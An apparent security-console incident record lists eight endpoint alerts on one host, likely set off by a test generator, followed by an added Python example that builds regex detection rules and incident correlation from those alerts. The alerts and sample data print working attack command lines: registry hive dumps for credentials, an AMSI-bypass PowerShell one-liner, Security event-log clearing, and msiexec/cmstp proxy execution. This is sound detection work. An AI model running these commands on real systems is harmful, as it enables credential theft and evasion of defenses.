Incident Overview

Incident ID CINC-20251220-78AD36BD
Severity Critical (90)
Status new
Alert Count 8
Host Count 1

Timeline

First Seen 2025-12-18 11:23:41
Last Seen 2025-12-18 11:24:56
Duration 0d 0h 1m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Observed Tactics:
Credential Access, AI Powered IOA, Execution, Defense Evasion, Persistence
Techniques:
OS Credential Dumping (T1003); Command and Scripting Interpreter: PowerShell (T1059.001); Indicator Removal (T1070); Event Triggered Execution (T1546); System Binary Proxy Execution: CMSTP (T1218.003); User Execution (T1204)

Affected Hosts (1)

TEAHEE

Related Alerts (8)

Severity | Status | Hostname | Tactic | Time

Critical | new | TEAHEE | Credential Access | 12-18 11:24
Description: A process saved the Security Account Manager (SAM) or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree.
Command Line: reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\system.hiv

High | new | TEAHEE | AI Powered IOA | 12-18 11:24
Description: A script meets the cloud-based behavioral machine learning model threshold for suspicious activity. Detection is based on code similarities to known malicious PowerShell scripts.
Command Line: powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"

Critical | new | TEAHEE | Credential Access | 12-18 11:24
Description: A process saved the Security Account Manager (SAM) or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree.
Command Line: reg save HKLM\SECURITY C:\Users\dokji\AppData\Local\Temp\security.hiv

High | new | TEAHEE | Execution | 12-18 11:24
Description: A PowerShell script attempted to bypass Microsoft's AntiMalware Scan Interface (AMSI). PowerShell exploit kits often attempt to bypass AMSI to evade detection. Review the script.
Command Line: powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"

High | new | TEAHEE | Defense Evasion | 12-18 11:24
Description: A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree.
Command Line: wevtutil cl Security

High | new | TEAHEE | Persistence | 12-18 11:24
Description: Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions.
Command Line: msiexec /q /i http://127.0.0.1/test.msi

High | new | TEAHEE | Defense Evasion | 12-18 11:24
Description: A CMSTP.exe process appears to have been supplied with a suspicious INF file. CMSTP.exe may be abused to load and execute DLLs and/or COM scriptlets (SCT) from remote servers. Review the command line.
Command Line: cmstp /s /ns C:\Users\dokji\AppData\Local\Temp\test.inf

Informational | new | TEAHEE | Execution | 12-18 11:23
Description: A process has written a known EICAR test file. Review the files written by the triggered process.
Command Line: "python" mega_incident_generator.py --rounds 2 --interval 30
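Correlation of the alerts above into one incident, as an added example that is not part of the incident record or of the console that produced it. It encodes the five command-line patterns from the Related Alerts table as regular-expression rules labelled with the incident's own tactic names, clusters matching process events per host into incidents separated by a quiet window, and escalates when a hive dump and an event-log clear land in the same cluster, which is the combination that makes this incident read as credential theft with anti-forensics. The sample events are constructed for the example: the TEAHEE command lines are copied from the table (seconds are invented, since the console shows only minutes), and the OTHERHOST entries are benign lookalikes that must not fire. Rule labels, the ten-minute window and the escalation pairing are choices made for this example, not settings of the product.

```python
"""Correlate process-creation events into incidents using the command-line
patterns from the Related Alerts table (added example; constructed data)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Detection rules as (label, tactic, pattern). Tactic names are the ones the
# incident's own alerts carry; labels are short names chosen for this example.
RULES = [
    # reg save of a hive holding credential material (SAM, SYSTEM, SECURITY).
    ("registry-hive-save", "Credential Access",
     re.compile(r'\breg(?:\.exe)?"?\s+save\s+"?(?:HKLM|HKEY_LOCAL_MACHINE)\\'
                r'(?:SAM|SYSTEM|SECURITY)\b', re.I)),
    # Reflection against AmsiUtils.amsiInitFailed, the AMSI bypass in the table.
    ("amsi-bypass-reflection", "Execution",
     re.compile(r"AmsiUtils.*amsiInitFailed", re.I | re.S)),
    # wevtutil cl / clear-log wipes an event log channel.
    ("event-log-clear", "Defense Evasion",
     re.compile(r'\bwevtutil(?:\.exe)?"?\s+(?:cl|clear-log)\b', re.I)),
    # msiexec installing a package fetched over HTTP(S).
    ("msiexec-remote-install", "Persistence",
     re.compile(r"\bmsiexec(?:\.exe)?.*\s(?:/i|/package)\s+https?://", re.I)),
    # cmstp handed an INF file, which can load DLLs or COM scriptlets.
    ("cmstp-inf", "Defense Evasion",
     re.compile(r"\bcmstp(?:\.exe)?.*\.inf\b", re.I)),
]


def classify(cmdline):
    """Return [(label, tactic)] for every rule the command line matches."""
    return [(label, tactic) for label, tactic, rx in RULES if rx.search(cmdline)]


def build_incidents(events, window=timedelta(minutes=10)):
    """Cluster matched events per host. A new incident starts when the gap from
    the previous matched event on that host exceeds `window`; events that match
    no rule are dropped. Each incident records span, count, labels and tactics,
    and is escalated when a hive save and a log clear occur together."""
    per_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        hits = classify(ev["cmdline"])
        if hits:
            per_host[ev["host"]].append((ev["time"], hits))

    incidents = []
    for host, rows in per_host.items():
        current = None
        for ts, hits in rows:
            if current is None or ts - current["last_seen"] > window:
                current = {"host": host, "first_seen": ts, "last_seen": ts,
                           "alert_count": 0, "labels": set(), "tactics": set()}
                incidents.append(current)
            current["last_seen"] = ts
            current["alert_count"] += 1
            current["labels"].update(label for label, _ in hits)
            current["tactics"].update(tactic for _, tactic in hits)

    for inc in incidents:
        inc["escalate"] = {"registry-hive-save", "event-log-clear"} <= inc["labels"]
    return incidents


# Constructed sample: TEAHEE command lines copied from the alert table with
# invented seconds; OTHERHOST entries are benign lookalikes that must not fire.
SAMPLE_EVENTS = [
    {"host": "TEAHEE", "time": datetime(2025, 12, 18, 11, 23, 41),
     "cmdline": '"python" mega_incident_generator.py --rounds 2 --interval 30'},
    {"host": "TEAHEE", "time": datetime(2025, 12, 18, 11, 24, 2),
     "cmdline": r"reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\system.hiv"},
    {"host": "TEAHEE", "time": datetime(2025, 12, 18, 11, 24, 5),
     "cmdline": r"reg save HKLM\SECURITY C:\Users\dokji\AppData\Local\Temp\security.hiv"},
    {"host": "TEAHEE", "time": datetime(2025, 12, 18, 11, 24, 10),
     "cmdline": "powershell -c \"[Ref].Assembly.GetType('System.Management.Automation."
                "AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\""},
    {"host": "TEAHEE", "time": datetime(2025, 12, 18, 11, 24, 20),
     "cmdline": "wevtutil cl Security"},
    {"host": "TEAHEE", "time": datetime(2025, 12, 18, 11, 24, 30),
     "cmdline": "msiexec /q /i http://127.0.0.1/test.msi"},
    {"host": "TEAHEE", "time": datetime(2025, 12, 18, 11, 24, 56),
     "cmdline": r"cmstp /s /ns C:\Users\dokji\AppData\Local\Temp\test.inf"},
    {"host": "OTHERHOST", "time": datetime(2025, 12, 18, 12, 0, 0),
     "cmdline": r"reg save HKCU\Software\Contoso C:\backup\contoso.hiv"},
    {"host": "OTHERHOST", "time": datetime(2025, 12, 18, 12, 0, 5),
     "cmdline": "wevtutil qe Security /c:5"},
]


def main():
    for inc in build_incidents(SAMPLE_EVENTS):
        span = inc["last_seen"] - inc["first_seen"]
        print(f'{inc["host"]}: {inc["alert_count"]} alerts over {span}, '
              f'tactics={sorted(inc["tactics"])}, escalate={inc["escalate"]}')


if __name__ == "__main__":
    main()
```

The EICAR-writing python process is deliberately not matched: the rules key on the technique-bearing command lines, so the generator shows up only in the process tree an analyst would pivot to from the hive-save alerts, as the alert text itself suggests.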